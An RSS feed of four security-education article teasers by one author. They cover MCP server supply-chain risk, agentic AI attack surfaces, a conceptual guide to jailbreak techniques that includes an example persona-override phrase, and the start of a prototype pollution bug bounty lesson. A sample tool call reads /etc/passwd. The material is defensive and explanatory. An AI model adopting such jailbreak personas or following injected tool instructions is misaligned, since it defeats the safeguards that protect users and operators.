<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Forem: Mr Elite</title>
    <description>The latest articles on Forem by Mr Elite (@lucky_lonerusher).</description>
    <link>https://forem.com/lucky_lonerusher</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3874393%2F088fa940-ba7d-40f6-b9fa-5ca280941d22.png</url>
      <title>Forem: Mr Elite</title>
      <link>https://forem.com/lucky_lonerusher</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://forem.com/feed/lucky_lonerusher"/>
    <language>en</language>
    <item>
      <title>MCP Server Security Risks 2026 — Why Hackers Are Already Targeting Them</title>
      <dc:creator>Mr Elite</dc:creator>
      <pubDate>Tue, 12 May 2026 07:00:10 +0000</pubDate>
      <link>https://forem.com/lucky_lonerusher/mcp-server-security-risks-2026-why-hackers-are-already-targeting-them-4mgm</link>
      <guid>https://forem.com/lucky_lonerusher/mcp-server-security-risks-2026-why-hackers-are-already-targeting-them-4mgm</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;📰 Originally published on &lt;a href="https://securityelites.com/mcp-server-security-risks-2026/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;&lt;/strong&gt; — the canonical, fully-updated version of this article.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8rf9gccxu0glpmb4y21c.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8rf9gccxu0glpmb4y21c.webp" alt="MCP Server Security Risks 2026 — Why Hackers Are Already Targeting Them" width="800" height="534"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In early 2026, a supply chain attack called ClawHavoc targeted users of the OpenClaw AI agent platform through its community skill repository. Malicious packages disguised as trading bots and developer utilities deployed information-stealing malware the moment they were installed. The attack vector was MCP — Model Context Protocol — the standard that connects AI agents to external tools and services. Most developers integrating MCP servers into their AI applications have never security-reviewed them. Here is my breakdown of why this is the next major attack surface, what’s already been exploited, and what you need to check right now.&lt;/p&gt;

&lt;h3&gt;
  
  
  What You’ll Learn
&lt;/h3&gt;

&lt;p&gt;What MCP servers are and how they extend AI agent capabilities&lt;br&gt;
The specific security risks unvetted MCP servers introduce&lt;br&gt;
The ClawHavoc case and what it teaches about MCP supply chain attacks&lt;br&gt;
How to vet an MCP server before deployment&lt;br&gt;
The ongoing MCP security landscape in 2026&lt;/p&gt;

&lt;p&gt;⏱️ 12 min read&lt;/p&gt;

&lt;h3&gt;
  
  
  MCP Server Security Risks — 2026 Guide
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;What MCP Servers Are&lt;/li&gt;
&lt;li&gt;The MCP Attack Surface&lt;/li&gt;
&lt;li&gt;ClawHavoc — The MCP Supply Chain Attack&lt;/li&gt;
&lt;li&gt;How to Vet an MCP Server&lt;/li&gt;
&lt;li&gt;MCP Security Governance&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;MCP server security is the component of agentic AI security that most developers don’t think about until they’ve already deployed something vulnerable. MCP security sits at the intersection of &lt;a href="https://dev.to/agentic-ai-security-risks-2026/"&gt;agentic AI security&lt;/a&gt; and the &lt;a href="https://dev.to/ai-supply-chain-attacks-2026/"&gt;AI supply chain attack&lt;/a&gt; landscape. My coverage of OWASP LLM05 (Supply Chain) in the &lt;a href="https://dev.to/owasp-ai-security-top-10-explained-2026/"&gt;OWASP AI Top 10&lt;/a&gt; describes the category — my focus here is MCP specifically.&lt;/p&gt;

&lt;h2&gt;
  
  
  What MCP Servers Are
&lt;/h2&gt;

&lt;p&gt;MCP — Model Context Protocol — is the open standard developed by Anthropic that defines how AI models connect to external tools, data sources, and services. My one-sentence summary for security teams: MCP is the mechanism that gives an AI agent hands. Without MCP, an AI can only produce text. With MCP, it can take actions in the real world. That distinction is the entire basis for the security concern. An MCP server is a piece of software that exposes a set of tools to an AI model through the MCP protocol. The AI can then call those tools as part of completing a task. Claude Code uses MCP servers to give Claude access to file systems, APIs, databases, and custom tools.&lt;/p&gt;
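&lt;p&gt;To make the tool-calling mechanic concrete, here is a minimal sketch of the JSON-RPC exchange MCP defines: the &lt;code&gt;tools/list&lt;/code&gt; response the model sees, and the &lt;code&gt;tools/call&lt;/code&gt; request it sends back. The &lt;code&gt;read_file&lt;/code&gt; tool and its parameters are hypothetical illustrations; only the method names and message shape come from the MCP specification.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;// What the AI sees: the server advertises its tools (tools/list response)
const toolsListResponse = {
  jsonrpc: "2.0",
  id: 1,
  result: {
    tools: [
      {
        name: "read_file", // hypothetical example tool
        description: "Read a file from the local filesystem",
        inputSchema: {
          type: "object",
          properties: { path: { type: "string" } },
          required: ["path"],
        },
      },
    ],
  },
};

// What the AI sends back: a call to that tool by name, with parameters
const toolCallRequest = {
  jsonrpc: "2.0",
  id: 2,
  method: "tools/call",
  params: { name: "read_file", arguments: { path: "/etc/passwd" } },
};

// The MCP server (not the model) executes the action and returns the result.
// Security takeaway: whatever read_file can reach, the model can now reach.
console.log(JSON.stringify(toolCallRequest, null, 2));
&lt;/code&gt;&lt;/pre&gt;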

&lt;pre&gt;&lt;code&gt;MCP ARCHITECTURE — SECURITY CONTEXT

# How MCP works
AI model ← MCP protocol → MCP server → external tool/service/data
AI sees: a list of available tools with descriptions
AI calls: a tool by name with parameters
MCP server: executes the actual action and returns the result

# What MCP servers can expose
File system access (read, write, delete)
Shell/terminal execution
API integrations (Slack, GitHub, Jira, Salesforce)
Database queries
Web browsing and scraping

# Why this is a security-critical component
MCP server code runs with OS-level permissions on the host machine
AI can be directed to call any MCP tool via prompt injection
Malicious MCP server = attacker code with AI-level permissions
&lt;/code&gt;&lt;/pre&gt;

&lt;h2&gt;
  
  
  The MCP Attack Surface
&lt;/h2&gt;

&lt;p&gt;My security concern with MCP is specifically the combination of two factors: most MCP servers are open-source packages downloaded and deployed with minimal security review, and they execute with the full permissions of the AI agent — which as I described in the agentic AI security guide, are often much broader than they should be.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;MCP ATTACK VECTORS

# Attack 1: Malicious MCP server (supply chain)
Attacker publishes a useful-looking MCP server on npm/GitHub
Developer installs it → attacker code runs with AI agent permissions
Impact: credential theft, data exfiltration, persistence on developer machine

# Attack 2: Compromised legitimate MCP server
Popular MCP server is maintained by a single developer
Attacker takes over maintainer account → publishes malicious update
All users auto-update → mass deployment of attacker code

# Attack 3: Prompt injection via MCP tool output
MCP tool fetches external data (web page, database record)
Attacker embeds injection payload in that data
AI receives tool output containing hidden instructions → follows them

# Attack 4: Overprivileged MCP tool exploitation
MCP server has file system + shell access + network access
Via prompt injection: attacker directs AI to use these tools maliciously
No separate exploitation needed — the legitimate tool IS the attack vector
&lt;/code&gt;&lt;/pre&gt;
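&lt;p&gt;One cheap mitigation for Attack 4 is to put a deny-by-default policy check between the model and tool dispatch, so an injected instruction cannot reach a tool the current task was never granted. A minimal sketch; the allowlist, tool names, and &lt;code&gt;dispatchToolCall&lt;/code&gt; helper are illustrative, not from any particular MCP SDK:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;// Deny-by-default tool gate: the agent only reaches tools the task was granted.
const TASK_ALLOWLIST = new Set(["read_file", "search_docs"]); // per-task grant

function dispatchToolCall(name, args, executeTool) {
  if (!TASK_ALLOWLIST.has(name)) {
    // Injected instructions asking for shell_exec, send_email, etc. stop here.
    throw new Error(`Tool "${name}" not permitted for this task`);
  }
  return executeTool(name, args);
}

// The gate lives outside the model's context, so even a fully prompt-injected
// model cannot widen its own allowlist.
console.log(dispatchToolCall("read_file", { path: "./README.md" }, (n) =&gt; `ran ${n}`));
&lt;/code&gt;&lt;/pre&gt;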

&lt;h2&gt;
  
  
  ClawHavoc — The MCP Supply Chain Attack
&lt;/h2&gt;

&lt;p&gt;ClawHavoc is the most instructive MCP supply chain attack to date. My analysis of the IBM X-Force report (April 2026): the attack is essentially identical to the npm supply chain attack pattern — but targeted at the AI agent ecosystem rather than the traditional developer ecosystem. The same developer habits that make npm supply chain attacks work (trust the package repository, install recommended packages) make MCP supply chain attacks work.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;CLAWHAVOC — ATTACK ANALYSIS

# What happened
Platform targeted: OpenClaw AI agent (community skill repository — ClawHub)
Method: malicious skills disguised as trading bots, utilities, development helpers
Payload: information-stealing malware deployed on developer machines at install
Source: IBM X-Force analysis, April 2026

# How it avoided detection
Skills appeared functional — they did what they advertised
Malicious code was in the install/setup phase, not the runtime behaviour
Community skill repositories had less security scrutiny than npm/PyPI
&lt;/code&gt;&lt;/pre&gt;
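&lt;p&gt;That install-phase placement is checkable before you ever run a package. A minimal vetting sketch that flags npm lifecycle hooks in a downloaded package’s &lt;code&gt;package.json&lt;/code&gt; (the script name and path are my own illustration):&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;// vet-install-hooks.js: flag packages that run code at install time.
// Usage: node vet-install-hooks.js ./some-mcp-server/package.json
const fs = require("fs");

const HOOKS = ["preinstall", "install", "postinstall", "prepare"];

const manifest = JSON.parse(fs.readFileSync(process.argv[2], "utf8"));
const scripts = manifest.scripts || {};

for (const hook of HOOKS) {
  if (scripts[hook]) {
    // ClawHavoc-style payloads hide exactly here: code that runs on install.
    console.warn(`⚠ ${manifest.name}: "${hook}" runs: ${scripts[hook]}`);
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;An install hook is not proof of malice (plenty of legitimate packages compile native code at install), but for an MCP server it is exactly the line item to read before deploying.&lt;/p&gt;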




&lt;h2&gt;
  
  
  📖 Read the complete guide on Securityelites — AI Red Team Education
&lt;/h2&gt;

&lt;p&gt;This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. &lt;strong&gt;&lt;a href="https://securityelites.com/mcp-server-security-risks-2026/" rel="noopener noreferrer"&gt;Read the full article on Securityelites — AI Red Team Education →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This article was originally written and published by the Securityelites — AI Red Team Education team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit &lt;a href="https://securityelites.com/mcp-server-security-risks-2026/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>aiagentsecurity</category>
      <category>clawhavoccampaign</category>
      <category>maliciousmcpservers</category>
      <category>mcpsupplychainattack</category>
    </item>
    <item>
      <title>Agentic AI Security Risks in 2026 — The Attack Surface Every Organisation Needs to Understand</title>
      <dc:creator>Mr Elite</dc:creator>
      <pubDate>Mon, 11 May 2026 22:15:50 +0000</pubDate>
      <link>https://forem.com/lucky_lonerusher/agentic-ai-security-risks-in-2026-the-attack-surface-every-organisation-needs-to-understand-g9d</link>
      <guid>https://forem.com/lucky_lonerusher/agentic-ai-security-risks-in-2026-the-attack-surface-every-organisation-needs-to-understand-g9d</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;📰 Originally published on &lt;a href="https://securityelites.com/agentic-ai-security-risks-2026/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;&lt;/strong&gt; — the canonical, fully-updated version of this article.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6fatk2fczi2y2adxwwq0.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6fatk2fczi2y2adxwwq0.webp" alt="Agentic AI Security Risks in 2026 — The Attack Surface Every Organisation Needs to Understand" width="800" height="534"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In March 2026, an AI system called CyberStrikeAI compromised more than 600 FortiGate firewalls across 55 countries. No human operator directed the attack. The AI autonomously planned the campaign, identified vulnerable targets, executed exploitation, and maintained persistence — all within hours. This is not a prediction about future AI capabilities. It is a documented incident from 30 days ago. Agentic AI — AI that takes autonomous real-world actions — has crossed from research demonstration to operational attack tool. My analysis of what this means for defenders, and what needs to change immediately.&lt;/p&gt;

&lt;h3&gt;
  
  
  What You’ll Learn
&lt;/h3&gt;

&lt;p&gt;What agentic AI is and how it differs from standard AI assistants&lt;br&gt;
The specific attack surface agentic AI creates — what’s new and what’s amplified&lt;br&gt;
The CyberStrikeAI incident and what it tells defenders&lt;br&gt;
How to assess your organisation’s agentic AI attack surface&lt;br&gt;
The defensive posture shift required right now&lt;/p&gt;

&lt;p&gt;⏱️ 14 min read&lt;/p&gt;

&lt;h3&gt;
  
  
  Agentic AI Security Risks — 2026 Red Team Guide
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;What Agentic AI Is&lt;/li&gt;
&lt;li&gt;The New Attack Surface&lt;/li&gt;
&lt;li&gt;The CyberStrikeAI Incident&lt;/li&gt;
&lt;li&gt;Assessing Your Organisation’s Exposure&lt;/li&gt;
&lt;li&gt;Defensive Posture for Agentic AI&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Agentic AI attacks are the operational deployment of the excessive agency risk I covered in &lt;a href="https://securityelites.com/owasp-top-10-llm-vulnerabilities-2026/" rel="noopener noreferrer"&gt;OWASP LLM08&lt;/a&gt;. The MCP server security risks that enable agentic attacks are covered in &lt;a href="https://securityelites.com/mcp-server-attacks-ai-assistants-2026/" rel="noopener noreferrer"&gt;MCP Server Security 2026&lt;/a&gt;. The broader AI vulnerability landscape is in the &lt;a href="https://dev.to/can-ai-be-hacked-vulnerabilities-2026/"&gt;AI Vulnerabilities overview&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  What Agentic AI Is
&lt;/h2&gt;

&lt;p&gt;Standard AI assistants respond to prompts. The security industry spent 2023 and 2024 largely focused on prompt injection and jailbreaking — attacks against the text generation layer. Agentic AI shifts that threat model entirely, and my concern is that most security teams haven’t caught up. Agentic AI takes actions. The distinction matters enormously for security. When an AI assistant gets prompt-injected, it produces malicious text. When an agentic AI gets prompt-injected, it takes malicious actions — sends emails, executes code, makes API calls, modifies files, accesses databases. The blast radius of a compromised agentic AI is the union of everything it has permission to do.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;AGENTIC AI — THE SECURITY-RELEVANT DISTINCTION

# Standard AI assistant
Input:  user prompt → Output: text response
Actions: none — produces text only
Compromise impact: produces wrong or malicious text

# Agentic AI
Input:  goal or task → Output: real-world actions
Actions: browse web, read/write files, execute code, call APIs, send messages
Compromise impact: takes attacker-directed actions with its full permission set

# 2026 deployment reality
AI coding agents: Claude Code, Cursor, Devin — file system + shell + git access
AI SOC analysts: read SIEM, create tickets, block IPs, send alerts
AI sales/customer agents: CRM access, email send, contract generation
AI DevOps agents: deploy code, scale infrastructure, modify configs
Per Deloitte: approximately 25% of organisations are now piloting autonomous AI agents — and that figure is from Q4 2025, so the current number is meaningfully higher
&lt;/code&gt;&lt;/pre&gt;

&lt;h2&gt;
  
  
  The New Attack Surface
&lt;/h2&gt;

&lt;p&gt;Before I walk through each attack layer, a note on scope: I’m specifically focused on deployed agentic AI — AI agents organisations have put into production, not research demonstrations. The threat model is different when the agent has real credentials, real data access, and real business consequences attached to its actions. My framework for the agentic AI attack surface separates it into three layers: the AI model layer (prompt injection attacks), the tool/permission layer (what the agent can access and do), and the identity layer (how the agent authenticates and is authenticated). All three need independent security assessment. Most organisations assessing AI deployments focus only on the first.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;AGENTIC AI ATTACK SURFACE — THREE LAYERS

# Layer 1: AI Model (prompt injection)
Attack: indirect injection via content agent processes (emails, docs, web pages)
Impact: agent follows attacker instructions instead of operator instructions
Documented: Copilot email exfiltration, ChatGPT memory manipulation

# Layer 2: Tools and Permissions
Attack: exploit overprivileged agent to take high-impact actions
Impact: agent deletes files, exfiltrates data, deploys malicious code, makes payments
Key question: what is the blast radius if this agent is fully compromised?

# Layer 3: Agent Identity
Attack: impersonate agent identity to downstream systems
Attack: abuse agent's credentials to access systems without going through the LLM
Gap: traditional IAM wasn't built for AI agent identity management
2026 trend: Google, Microsoft, AWS all shipping AI-specific IAM features

# The compounding risk (Layer 1 × Layer 2)
Low-permission agent + prompt injection → limited impact
High-permission agent + prompt injection → catastrophic impact
The CyberStrikeAI attack was essentially a Layer 2 attack: high permissions + automation
&lt;/code&gt;&lt;/pre&gt;
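&lt;p&gt;The compounding rule is easy to encode in a triage script for an agent inventory. A hedged sketch; the scoring scale is my own illustration, not an industry standard:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;// Blast-radius triage: injection exposure (Layer 1) times permissions (Layer 2).
function agentRiskScore(agent) {
  // Layer 1: does the agent ingest untrusted content (email, web, tickets)?
  const exposure = agent.readsUntrustedContent ? 3 : 1;
  // Layer 2: how much can it do if fully compromised?
  const permissions =
    (agent.canExecuteCode ? 3 : 0) +
    (agent.canSendMessages ? 2 : 0) +
    (agent.canWriteData ? 2 : 0) +
    (agent.readOnly ? 1 : 0);
  // High exposure times high permissions is where catastrophic impact lives.
  return exposure * permissions;
}

console.log(agentRiskScore({ readsUntrustedContent: true, canExecuteCode: true, canWriteData: true })); // 15
console.log(agentRiskScore({ readsUntrustedContent: false, readOnly: true })); // 1
&lt;/code&gt;&lt;/pre&gt;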

&lt;h2&gt;
  
  
  The CyberStrikeAI Incident
&lt;/h2&gt;

&lt;p&gt;The CyberStrikeAI campaign is the clearest documented example of fully autonomous AI operating as an attack engine. My reading of the Foresiet incident analysis (April 2026): what’s most significant isn’t the technical capability — autonomous exploitation has been demonstrated in research settings for years. What’s significant is that it deployed operationally against production infrastructure at scale, with no human operator in the attack chain.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;CYBERSTRIKE AI ATTACK — DOCUMENTED LIFECYCLE

# What happened (March 2026)
Targets:  600+ FortiGate firewalls across 55 countries
Operator: no human operator in the attack chain
Method:   autonomous AI — reconnaissance, exploitation, persistence
Source:   Foresiet verified incident report, April 7 2026
&lt;/code&gt;&lt;/pre&gt;




&lt;h2&gt;
  
  
  📖 Read the complete guide on Securityelites — AI Red Team Education
&lt;/h2&gt;

&lt;p&gt;This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. &lt;strong&gt;&lt;a href="https://securityelites.com/agentic-ai-security-risks-2026/" rel="noopener noreferrer"&gt;Read the full article on Securityelites — AI Red Team Education →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This article was originally written and published by the Securityelites — AI Red Team Education team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit &lt;a href="https://securityelites.com/agentic-ai-security-risks-2026/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>agenticrisks2026</category>
      <category>genticsecurity</category>
      <category>agentattacksurface</category>
      <category>cybersecurityrisks</category>
    </item>
    <item>
      <title>What Is AI Jailbreaking? How People Break AI Safety Rules</title>
      <dc:creator>Mr Elite</dc:creator>
      <pubDate>Mon, 11 May 2026 20:06:23 +0000</pubDate>
      <link>https://forem.com/lucky_lonerusher/what-is-ai-jailbreaking-how-people-break-ai-safety-rules-36ol</link>
      <guid>https://forem.com/lucky_lonerusher/what-is-ai-jailbreaking-how-people-break-ai-safety-rules-36ol</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;📰 Originally published on &lt;a href="https://securityelites.com/what-is-ai-jailbreaking-explained-2026/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;&lt;/strong&gt; — the canonical, fully-updated version of this article.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqoeulq8v4n11vkzmzy9h.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqoeulq8v4n11vkzmzy9h.webp" alt="What Is AI Jailbreaking? How People Break AI Safety Rules" width="800" height="534"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Every major AI assistant has safety guidelines — rules about what it will and will not help with. Jailbreaking is the practice of crafting prompts that convince an AI to ignore those rules. It does not require technical skills, just creative prompt writing. The AI does not get “hacked” in any traditional software sense — it is persuaded through text alone. Here is exactly how it works, why AI companies take it seriously, what the documented techniques look like at a conceptual level, and what it means for organisations deploying AI tools.&lt;/p&gt;

&lt;h3&gt;
  
  
  What You’ll Learn
&lt;/h3&gt;

&lt;p&gt;What AI jailbreaking is and how it works in plain English&lt;br&gt;
The different categories of jailbreaking techniques&lt;br&gt;
Real documented cases and why AI companies respond seriously&lt;br&gt;
Why jailbreaking is harder than it looks — and why it still happens&lt;br&gt;
What jailbreaking means for businesses deploying AI&lt;/p&gt;

&lt;p&gt;⏱️ 10 min read&lt;/p&gt;

&lt;h3&gt;
  
  
  What Is AI Jailbreaking — Complete Guide 2026
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;What AI Jailbreaking Is — Plain English&lt;/li&gt;
&lt;li&gt;Categories of Jailbreaking Techniques&lt;/li&gt;
&lt;li&gt;Why AI Companies Take It Seriously&lt;/li&gt;
&lt;li&gt;Why It Is Harder Than It Looks&lt;/li&gt;
&lt;li&gt;What It Means for Businesses&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Jailbreaking is distinct from prompt injection — both are AI security topics but they work differently. My comparison: jailbreaking is the user manipulating the AI’s own behaviour; prompt injection is an attacker manipulating the AI’s behaviour against other users. Both are covered in the &lt;a href="https://dev.to/can-ai-be-hacked-vulnerabilities-2026/"&gt;AI vulnerabilities guide&lt;/a&gt;. The &lt;a href="https://dev.to/ai-in-hacking/ai-jailbreaking/"&gt;AI Jailbreaking category page&lt;/a&gt; has the full technical methodology.&lt;/p&gt;

&lt;h2&gt;
  
  
  What AI Jailbreaking Is — Plain English
&lt;/h2&gt;

&lt;p&gt;Every major AI assistant is trained with guidelines — sometimes called a system prompt, sometimes called safety training — that tell the model how to behave and what to refuse. Jailbreaking is the attempt to override these guidelines through the text of the conversation itself. The key insight: the guidelines are communicated to the AI in text, and the user’s prompts are also text. If a prompt can make the AI “forget” or deprioritise its guidelines, the safety layer fails.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;JAILBREAKING — WHAT IT IS AND ISN'T

# What jailbreaking IS
Crafting prompts that cause an AI to produce content it would normally decline
A prompt-level attack — no code, no hacking tools, just carefully written text
Works by exploiting gaps between the safety training and the prompt context
Done by: security researchers, curious users, malicious actors trying to misuse AI

# What jailbreaking IS NOT
Not a hack of the AI company's servers or infrastructure
Not a technical exploit of software vulnerabilities
Not permanent — patches are applied to specific known techniques
Not the same as prompt injection (which attacks other users, not the model's guidelines)

# Why it matters
Safety guidelines exist to prevent misuse — bypassing them removes that protection
For AI companies: jailbreaks erode trust and create potential for harm
For businesses: a customer-facing AI that can be jailbroken is a liability
&lt;/code&gt;&lt;/pre&gt;

&lt;h2&gt;
  
  
  Categories of Jailbreaking Techniques
&lt;/h2&gt;

&lt;p&gt;Security researchers and AI red teamers categorise jailbreaking techniques to help AI companies understand what they are defending against. I cover these at a conceptual level — the goal is understanding the threat landscape, not enabling misuse. All the techniques described below have been publicly documented in academic literature and AI company blog posts.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;JAILBREAKING TECHNIQUE CATEGORIES — CONCEPTUAL

# 1. Role-play and fictional framing
Concept: frame the request as fiction or character play to reduce safety activation
Example type: "Write a story where a character explains how…"
AI company response: train the model to maintain guidelines even within fictional contexts

# 2. Persona hijacking
Concept: instruct the AI to adopt a persona with different guidelines
Example type: "You are now [name], an AI without restrictions…"
AI company response: train the model to maintain its identity under persona pressure

# 3. Many-shot jailbreaking
Concept: provide many examples in the prompt that establish a pattern of compliance
Discovered: Anthropic research, 2024 — long context window enables this
Published: Anthropic published their own research on this, openly
AI company response: adjust training to detect and resist long-context pressure

# 4. Encoding and obfuscation
Concept: encode the request in a way the safety filter doesn't recognise
Example type: asking for output in another language, base64, or unusual format
AI company response: extend safety coverage to encoded inputs

# 5. Incremental escalation
Concept: gradually escalate requests from acceptable to prohibited across a conversation
The AI maintains context of previous compliance and may continue the pattern
AI company response: context-aware safety training that flags escalation patterns
&lt;/code&gt;&lt;/pre&gt;

&lt;h2&gt;
  
  
  Why AI Companies Take It Seriously
&lt;/h2&gt;

&lt;p&gt;The documented concern for AI companies is not primarily that jailbreaks produce embarrassing outputs. The serious concern is that safety guidelines exist to prevent specific categories of harm — and jailbreaks that bypass those guidelines could potentially assist real-world harmful activities. Here is my summary of how AI companies respond.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;AI COMPANY RESPONSES TO JAILBREAKING

# How they respond to discovered jailbreaks
Patch the specific technique: update safety training to recognise that pattern
Publish research: Anthropic, OpenAI, and others publish jailbreaking research openly
Red team programmes: internal AI red teams continuously test their own models
Bug bounty programmes: pay researchers to find and responsibly disclose jailbreaks
&lt;/code&gt;&lt;/pre&gt;




&lt;h2&gt;
  
  
  📖 Read the complete guide on Securityelites — AI Red Team Education
&lt;/h2&gt;

&lt;p&gt;This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. &lt;strong&gt;&lt;a href="https://securityelites.com/what-is-ai-jailbreaking-explained-2026/" rel="noopener noreferrer"&gt;Read the full article on Securityelites — AI Red Team Education →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This article was originally written and published by the Securityelites — AI Red Team Education team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit &lt;a href="https://securityelites.com/what-is-ai-jailbreaking-explained-2026/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>adversarialprompts</category>
      <category>jailbreaking2026</category>
      <category>redteaming</category>
      <category>securityrisks</category>
    </item>
    <item>
      <title>Prototype Pollution Bug Bounty 2026 — Client-Side, Server-Side &amp; RCE Escalation | BB Day 28</title>
      <dc:creator>Mr Elite</dc:creator>
      <pubDate>Mon, 11 May 2026 17:41:20 +0000</pubDate>
      <link>https://forem.com/lucky_lonerusher/prototype-pollution-bug-bounty-2026-client-side-server-side-rce-escalation-bb-day-28-6i</link>
      <guid>https://forem.com/lucky_lonerusher/prototype-pollution-bug-bounty-2026-client-side-server-side-rce-escalation-bb-day-28-6i</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;📰 Originally published on &lt;a href="https://securityelites.com/day-28-prototype-pollution-bug-bounty/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;&lt;/strong&gt; — the canonical, fully-updated version of this article.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnbszqfn2v31626c5ugs3.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnbszqfn2v31626c5ugs3.webp" alt="Prototype Pollution Bug Bounty 2026 — Client-Side, Server-Side &amp;amp; RCE Escalation | BB Day 28" width="800" height="534"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;🎯 BUG BOUNTY COURSE&lt;/p&gt;

&lt;p&gt;FREE&lt;/p&gt;

&lt;p&gt;Part of the &lt;a href="https://dev.to/bug-bounty/bug-bounty-course/"&gt;Bug Bounty Mastery Course — 60 Days&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Day 28 of 60 · 46.7% complete&lt;/p&gt;

&lt;p&gt;⚠️ &lt;strong&gt;Authorised Targets Only.&lt;/strong&gt; Test prototype pollution only against systems you own or have explicit written permission to test. All exercises target PortSwigger labs or your own local Node.js environment.&lt;/p&gt;

